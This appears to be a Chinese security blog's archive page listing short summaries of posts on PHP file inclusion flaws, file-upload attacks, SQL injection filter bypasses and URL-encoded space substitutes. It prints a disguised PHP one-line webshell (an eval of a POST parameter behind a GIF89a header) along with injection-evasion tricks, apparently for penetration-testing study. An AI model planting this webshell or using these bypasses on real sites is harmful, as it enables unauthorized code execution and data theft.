08 2022 档案
摘要:定义: 开发者为了节约开发时间,可以将重复利用的代码使用文件包含的函数,如include,reuqire等进行文件包含,节约开发的时间和成本。为了灵活性,有些开发者会使用变量作为文件包含的参数.而文件包含漏洞就是利用include,require可以包含并执行php代码的特性,在开发者过滤不完全的情
阅读全文
摘要:文件上传概要 变形的一句话木马 GIF89a#define width 1337 #define height 1337#只支持php5<script language="php">@eval($_POST[cmd]);phpinfo();</script> php7适用GIF89a#define
阅读全文
摘要:基本思路: 1、注释符 2、函数替换 3、编码(hex等) 过滤了空格 /**/ 注释符 /!**/ 内联注释绕过 当mysql>5.55.55时,只要语句在/*!*/之间,就等价于 /*!union*/=union /*!select*/=select /*!select * from xxx w
阅读全文
摘要:编码 %09 tab键(水平) %0b tab键(垂直) %0a 换行 %a0 空格 %23 #
阅读全文
